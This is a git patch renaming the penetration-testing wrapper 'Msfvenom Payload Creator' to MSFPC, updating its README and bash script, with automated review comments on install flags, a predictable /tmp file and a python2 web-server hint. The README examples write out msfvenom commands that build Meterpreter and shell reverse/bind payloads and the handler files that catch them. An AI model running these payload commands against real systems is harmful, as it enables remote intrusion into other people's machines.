From f648fc308bb588d56a3d15d04cc78fba5106a413 Mon Sep 17 00:00:00 2001 From: g0tmi1k Date: Fri, 9 Jun 2017 11:50:59 +0100 Subject: [PATCH] v1.4.4: mpc.sh -> msfpc.sh --- README.md | 122 ++++++++++++++++++++++++--------------------- mpc.sh => msfpc.sh | 24 +++++---- 2 files changed, 78 insertions(+), 68 deletions(-) rename mpc.sh => msfpc.sh (98%) mode change 100755 => 100644 diff --git a/README.md b/README.md index 0718066..ba15449 100644 --- a/README.md +++ b/README.md @@ -1,9 +1,9 @@ -## Msfvenom Payload Creator (MPC) +## MSFvenom Payload Creator (MSFPC) A **quick** way to generate various "basic" Meterpreter payloads via `msfvenom` (part of the Metasploit framework).

- mpc logo + msfpc logo

@@ -12,21 +12,21 @@ A **quick** way to generate various "basic" Meterpreter payloads via `msfvenom` ## About -Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as **simple as possible** (**only requiring one input**) to produce their payload. +MSFvenom Payload Creator (MSFPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as **simple as possible** (**only requiring one input**) to produce their payload. -**Fully automating** msfvenom & Metasploit is the end goal _(well as to be be able to automate MPC itself)_. +**Fully automating** msfvenom & Metasploit is the end goal _(well as to be be able to automate MSFPC itself)_. The rest is to make the user's life as **easy as possible** (e.g. **IP selection menu**, **msfconsole resource file/commands**, **batch payload production** and able to enter **any argument in any order** _(in various formats/patterns)_). The only necessary input from the user should be **defining the payload** they want by either the **platform** (e.g. `windows`), or the **file extension** they wish the payload to have (e.g. `exe`). * **Can't remember your IP for a interface? Don't sweat it, just use the interface name**: `eth0`. -* **Don't know what your external IP is? MPC will discover it**: `wan`. +* **Don't know what your external IP is? MSFPC will discover it**: `wan`. * **Want to generate one of each payload? No issue!** Try: `loop`. * **Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem**. Try: `batch` (for everything), `batch msf` (for every Meterpreter option), `batch staged` (for every staged payload), or `batch cmd stageless` (for every stageless command prompt)! 
_Note: This will **NOT** try to bypass any anti-virus solutions at any stage._ -![Msfvenom Payload Creator (MPC)](https://i.imgur.com/qxRwnYD.png) +![Msfvenom Payload Creator (MSFPC)](https://i.imgur.com/tN9q5iG.png) - - - @@ -34,18 +34,26 @@ _Note: This will **NOT** try to bypass any anti-virus solutions at any stage._ ## Install -+ Designed for **Kali Linux v2.x** & **Metasploit v4.11+**. ++ Designed for **Kali Linux v2.x/Rolling** & **Metasploit v4.11+**. + Kali v1.x should work. + OSX 10.11+ should work. + Weakerth4n 6+ should work. + _...nothing else has been tested._ ``` -curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc -chmod +x /usr/bin/mpc -mpc +$ curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc +$ chmod 0755 /usr/local/bin/msfpc ``` +### Kali-Linux + +MSFPC is already [packaged](https://pkg.kali.org/pkg/msfpc) in [Kali Rolling](https://www.kali.org/), so all you have to-do is: + +```bash +root@kali:~# apt install -y msfpc +``` + + - - - 
@@ -53,18 +61,19 @@ mpc ## Help ``` -root@kali:~# mpc -h -v - [*] Msfvenom Payload Creator (MPC v1.4) +$ bash msfpc.sh -h -v + [*] MSFvenom Payload Creator (MSFPC v1.4.4) - /usr/bin/mpc () () () () () () () () - Example: /usr/bin/mpc windows 192.168.1.10 # Windows & manual IP. - /usr/bin/mpc elf bind eth0 4444 # Linux, eth0's IP & manual port. - /usr/bin/mpc stageless cmd py https # Python, stageless command prompt. - /usr/bin/mpc verbose loop eth1 # A payload for every type, using eth1's IP. - /usr/bin/mpc msf batch wan # All possible Meterpreter payloads, using WAN IP. - /usr/bin/mpc help verbose # Help screen, with even more information. + msfpc.sh () () () () () () () () + Example: msfpc.sh windows 192.168.1.10 # Windows & manual IP. + msfpc.sh elf bind eth0 4444 # Linux, eth0's IP & manual port. + msfpc.sh stageless cmd py https # Python, stageless command prompt. + msfpc.sh verbose loop eth1 # A payload for every type, using eth1's IP. + msfpc.sh msf batch wan # All possible Meterpreter payloads, using WAN IP. + msfpc.sh help verbose # Help screen, with even more information. : + + APK + ASP + ASPX + Bash [.sh] @@ -78,7 +87,7 @@ root@kali:~# mpc -h -v + Tomcat [.war] + Windows [.exe // .dll] - Rather than putting , you can do a interface and MPC will detect that IP address. + Rather than putting , you can do a interface and MSFPC will detect that IP address. Missing will default to the IP menu. Missing will default to 443. @@ -117,15 +126,15 @@ root@kali:~# mpc -h -v will just create one of each . will display more information. -root@kali:~# +$ ``` ## Example \#1 (Windows, Fully Automated Using Manual IP) ```bash -root@kali:~# bash mpc.sh windows 192.168.1.10 - [*] Msfvenom Payload Creator (MPC v1.4) +$ bash msfpc.sh windows 192.168.1.10 + [*] MSFvenom Payload Creator (MSFPC v1.4.4) [i] IP: 192.168.1.10 [i] PORT: 443 [i] TYPE: windows (windows/meterpreter/reverse_tcp) 
@@ -133,23 +142,22 @@ root@kali:~# bash mpc.sh windows 192.168.1.10 --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 \ > '/root/windows-meterpreter-staged-reverse-tcp-443.exe' - [i] File (/root/windows-meterpreter-staged-reverse-tcp-443.exe) already exists. Overwriting... [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe' [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc' [i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc' - [?] Quick web server (for file transfer)?: python -m SimpleHTTPServer 8080 + [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080 [*] Done! -root@kali:~# +$ ``` ## Example \#2 (Linux Format, Fully Automated Using Manual Interface and Port) ```bash -root@kali:~# ./mpc.sh elf bind eth0 4444 verbose - [*] Msfvenom Payload Creator (MPC v1.4) - [i] IP: 192.168.103.183 +$ ./msfpc.sh elf bind eth0 4444 verbose + [*] MSFvenom Payload Creator (MSFPC v1.4.4) + [i] IP: 192.168.103.142 [i] PORT: 4444 [i] TYPE: linux (linux/x86/shell/bind_tcp) [i] SHELL: shell @@ -160,7 +168,6 @@ root@kali:~# ./mpc.sh elf bind eth0 4444 verbose --platform linux -a x86 -e generic/none LPORT=4444 \ > '/root/linux-shell-staged-bind-tcp-4444.elf' - [i] File (/root/linux-shell-staged-bind-tcp-4444.elf) already exists. Overwriting... [i] linux shell created: '/root/linux-shell-staged-bind-tcp-4444.elf' [i] File: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size 
@@ -170,39 +177,38 @@ root@kali:~# ./mpc.sh elf bind eth0 4444 verbose [i] MSF handler file: '/root/linux-shell-staged-bind-tcp-4444-elf.rc' [i] Run: msfconsole -q -r '/root/linux-shell-staged-bind-tcp-4444-elf.rc' - [?] Quick web server (for file transfer)?: python -m SimpleHTTPServer 8080 + [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080 [*] Done! -root@kali:~# +$ ``` ## Example \#3 (Python Format, Interactive IP Menu) ```bash -root@kali:~# mpc stageless cmd py tcp - [*] Msfvenom Payload Creator (MPC v1.4) +$ msfpc stageless cmd py tcp + [*] MSFvenom Payload Creator (MSFPC v1.4.4) [i] Use which interface - IP address?: - [i] 1.) eth0 - 192.168.103.183 - [i] 2.) tap0 - 10.10.100.63 - [i] 3.) lo - 127.0.0.1 - [i] 4.) wan - xxx.xxx.xxx.xxx - [?] Select 1-4, interface or IP address: 2 + [i] 1.) eth0 - 192.168.103.142 + [i] 2.) lo - 127.0.0.1 + [i] 3.) wan - 31.204.154.174 + [?] Select 1-3, interface or IP address: 1 - [i] IP: 10.10.100.63 + [i] IP: 192.168.103.142 [i] PORT: 443 [i] TYPE: python (python/shell_reverse_tcp) [i] CMD: msfvenom -p python/shell_reverse_tcp -f raw \ - --platform python -e generic/none -a python LHOST=10.10.100.63 LPORT=443 \ + --platform python -e generic/none -a python LHOST=192.168.103.142 LPORT=443 \ > '/root/python-shell-stageless-reverse-tcp-443.py' [i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py' [i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc' [i] Run: msfconsole -q -r '/root/python-shell-stageless-reverse-tcp-443-py.rc' - [?] Quick web server (for file transfer)?: python -m SimpleHTTPServer 8080 + [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080 [*] Done! -root@kali:~# +$ ``` _Note: Removed WAN IP._ 
@@ -211,37 +217,39 @@ _Note: Removed WAN IP._ ## Example \#4 (Loop - Generates one of everything) ```bash -root@kali:~# ./mpc.sh loop wan - [*] Msfvenom Payload Creator (MPC v1.4) +$ ./msfpc.sh loop wan + [*] MSFvenom Payload Creator (MSFPC v1.4.4) [i] Loop Mode. Creating one of each TYPE, with default values - [*] Msfvenom Payload Creator (MPC v1.4) + [*] MSFvenom Payload Creator (MSFPC v1.4.4) [i] IP: xxx.xxx.xxx.xxx [i] PORT: 443 - [i] TYPE: windows (windows/meterpreter/reverse_tcp) - [i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f asp \ - --platform windows -a x86 -e generic/none LHOST=xxx.xxx.xxx.xxx LPORT=443 \ - > '/root/windows-meterpreter-staged-reverse-tcp-443.asp' + [i] TYPE: android (android/meterpreter/reverse_tcp) + [i] CMD: msfvenom -p android/meterpreter/reverse_tcp \ + LHOST=xxx.xxx.xxx.xxx LPORT=443 \ + > '/root/android-meterpreter-stageless-reverse-tcp-443.apk' - [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.asp' + [i] android meterpreter created: '/root/android-meterpreter-stageless-reverse-tcp-443.apk' - [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-asp.rc' - [i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-asp.rc' - [?] Quick web server (for file transfer)?: python -m SimpleHTTPServer 8080 + [i] MSF handler file: '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc' + [i] Run: msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc' + [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080 [*] Done! - [*] Msfvenom Payload Creator (MPC v1.4) + [*] MSFvenom Payload Creator (MSFPC v1.4.4) + ...SNIP... + [*] Done! -root@kali ~$ +$ ``` _Note: Removed WAN IP._ -![Examples](https://i.imgur.com/lQFiqil.png) +![Examples](https://i.imgur.com/8zPx6p3.png) - - - diff --git a/mpc.sh b/msfpc.sh old mode 100755 new mode 100644 similarity index 98% rename from mpc.sh rename to msfpc.sh index 1b45ae2..93e7ddd 
--- a/mpc.sh
+++ b/msfpc.sh
@@ -1,6 +1,6 @@
 #!/bin/bash
 #-Metadata----------------------------------------------------#
-# Filename: mpc.sh (v1.4.3) (Update: 2016-06-30) #
+# Filename: msfpc.sh (v1.4.4) (Update: 2017-06-09) #
 #-Info--------------------------------------------------------#
 # Quickly generate Metasploit payloads using msfvenom. #
 #-Author(s)---------------------------------------------------#
@@ -28,7 +28,7 @@
 #-------------------------------------------------------------#
 #--Quick Install----------------------------------------------#
-# curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc; chmod +x /usr/bin/mpc
+# curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/bin/msfpc; chmod +x /usr/bin/msfpc
 #-------------------------------------------------------------#
 #-More information--------------------------------------------#
@@ -119,7 +119,7 @@ function doAction {
 CMD=$(echo $CMD | sed 's/\\\\\n//g')
 [[ -e "${FILENAME}" ]] && echo -e " ${YELLOW}[i]${RESET} File (${FILENAME}) ${YELLOW}already exists${RESET}. ${YELLOW}Overwriting...${RESET}" && rm -f "${FILENAME}"
- eval "${CMD}" 2>/tmp/mpc.out
+ eval "${CMD}" 2>/tmp/msfpc.out
 [[ ! -s "${FILENAME}" ]] && rm -f "${FILENAME}"
 if [[ -e "${FILENAME}" ]]; then
 echo -e " ${YELLOW}[i]${RESET} ${TYPE} ${SHELL} created: '${YELLOW}${FILENAME}${RESET}'"
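Review bot: The updated quick-install one-liner in the -28 hunk still passes `-k` to curl, so the script fetched from raw.githubusercontent.com is installed as an executable with certificate verification switched off; the README Install hunk carries the same flag. Dropping it, `curl -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/bin/msfpc; chmod +x /usr/bin/msfpc`, keeps TLS validation on the download at no cost. The README block in this same commit also moves the destination to /usr/local/bin/msfpc with `chmod 0755`, while this comment keeps /usr/bin/msfpc and `chmod +x`; the two install instructions should agree.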
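Review bot: `eval "${CMD}" 2>/tmp/msfpc.out` still sends msfvenom's stderr to a fixed, predictable name in the shared /tmp directory; the rename from mpc.out does not change that, so a file or symlink of that name left by another local user is followed, and two concurrent runs overwrite each other's output. The -127 hunk reads, prints and removes the same path. A per-run file from mktemp avoids both: a variable such as `MSFPC_OUT=$(mktemp) || exit 1` with `trap 'rm -f -- "${MSFPC_OUT}"' EXIT` once near the top of the script, then `eval "${CMD}" 2>"${MSFPC_OUT}"` here and the same variable in the grep, rm and cat lines of the -127 hunk. doAction begins before this hunk and the `if` opened on its last lines closes after it.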
@@ -127,22 +127,22 @@ function doAction {
 \chmod +x "${FILENAME}"
 else
 echo ""
- \grep -q 'Invalid Payload Selected' /tmp/mpc.out 2>/dev/null
+ \grep -q 'Invalid Payload Selected' /tmp/msfpc.out 2>/dev/null
 if [[ "$?" == '0' ]]; then
 echo -e "\n ${YELLOW}[i]${RESET} ${RED}Invalid Payload Selected${RESET} (Metasploit doesn't support this) =(" >&2
- \rm -f /tmp/mpc.out
+ \rm -f /tmp/msfpc.out
 else
 echo -e "\n ${YELLOW}[i]${RESET} Something went wrong. ${RED}Issue creating file${RESET} =(." >&2
 echo -e "\n----------------------------------------------------------------------------------------"
 [ -e "/usr/share/metasploit-framework/build_rev.txt" ] && \cat /usr/share/metasploit-framework/build_rev.txt || \msfconsole -v
 \uname -a
 echo -e "----------------------------------------------------------------------------------------${RED}"
- \cat /tmp/mpc.out
+ \cat /tmp/msfpc.out
 echo -e "${RESET}----------------------------------------------------------------------------------------\n"
 fi
 exit 2
 fi
- #\rm -f /tmp/mpc.out
+ #\rm -f /tmp/msfpc.out
 [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} File: $(\file -b ${FILENAME})"
 [[ "${VERBOSE}" == "true" ]] && echo -e " ${YELLOW}[i]${RESET} Size: $(\du -h ${FILENAME} | \cut -f1)"
@@ -155,13 +155,15 @@ function doAction {
 cat < "${FILEHANDLE}"
 #
-# [Kali 2.x]: systemctl start postgresql; msfdb start; msfconsole -q -r '${FILEHANDLE}'
+# [Kali 1]: service postgresql start; service metasploit start; msfconsole -q -r '${FILEHANDLE}'
+# [Kali 2.x/Rolling]: msfdb start; msfconsole -q -r '${FILEHANDLE}'
 #
 use exploit/multi/handler
 set PAYLOAD ${PAYLOAD}
 set ${HOST} ${IP}
 set LPORT ${PORT}
 set ExitOnSession false
+#set AutoRunScript 'post/windows/manage/migrate'
 run -j
 EOF
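Review bot: The new `#set AutoRunScript 'post/windows/manage/migrate'` line in the -155 hunk is written into every generated handler file, yet doAction also produces the linux, python and android handlers shown in the README examples, where a windows post module does not apply. Either emit that line only when `${TYPE}` is windows, or make the comment say so, e.g. `#set AutoRunScript 'post/windows/manage/migrate'   # Windows payloads only`. The heredoc delimiter was lost in rendering, but `${FILEHANDLE}` in the comment lines suggests it is unquoted, so `${PAYLOAD}`, `${HOST}`, `${IP}` and `${PORT}` land verbatim in commands msfconsole executes; I cannot see from this hunk where IP and PORT are validated, which is worth confirming. doAction begins before this hunk.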
@@ -197,7 +199,7 @@ function doHelp {
 echo -e " + ${YELLOW}Tomcat${RESET} [.${YELLOW}war${RESET}]"
 echo -e " + ${YELLOW}Windows${RESET} [.${YELLOW}exe${RESET} // .${YELLOW}dll${RESET}]"
 echo ""
- echo -e " Rather than putting , you can do a interface and MPC will detect that IP address."
+ echo -e " Rather than putting , you can do a interface and MSFPC will detect that IP address."
 echo -e " Missing will default to the IP menu."
 echo ""
 echo -e " Missing will default to 443."
@@ -244,7 +246,7 @@ function doHelp {
 ## Banner
-echo -e " ${BLUE}[*]${RESET} ${BLUE}M${RESET}sfvenom ${BLUE}P${RESET}ayload ${BLUE}C${RESET}reator (${BLUE}MPC${RESET} v${BLUE}1.4.3${RESET})"
+echo -e " ${BLUE}[*]${RESET} ${BLUE}MSF${RESET}venom ${BLUE}P${RESET}ayload ${BLUE}C${RESET}reator (${BLUE}MSFPC${RESET} v${BLUE}1.4.4${RESET})"
 ## Check system
@@ -786,7 +788,7 @@ fi
 ##### Done!
 if [[ "${SUCCESS}" == true ]]; then
- echo -e " ${GREEN}[?]${RESET} ${GREEN}Quick web server${RESET} (for file transfer)?: python -m SimpleHTTPServer 8080"
+ echo -e " ${GREEN}[?]${RESET} ${GREEN}Quick web server${RESET} (for file transfer)?: python2 -m SimpleHTTPServer 8080"
 echo -e " ${BLUE}[*]${RESET} ${BLUE}Done${RESET}!"
 else
 doHelp
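Review bot: The hint in the -786 hunk now hard-codes `python2 -m SimpleHTTPServer 8080`, which only works on hosts that still ship a python2 binary; the Python 3 form is `python3 -m http.server 8080`, and the message could choose between them with `command -v python2 >/dev/null`. Either command serves the whole current directory, including the generated handler .rc that holds the listener address, to any host that can reach port 8080, so the hint could also mention a bind address (`python3 -m http.server --bind <ADDR> 8080`) or running it from a directory that contains only the file to transfer. The `if`/`else` this line sits in closes after the hunk.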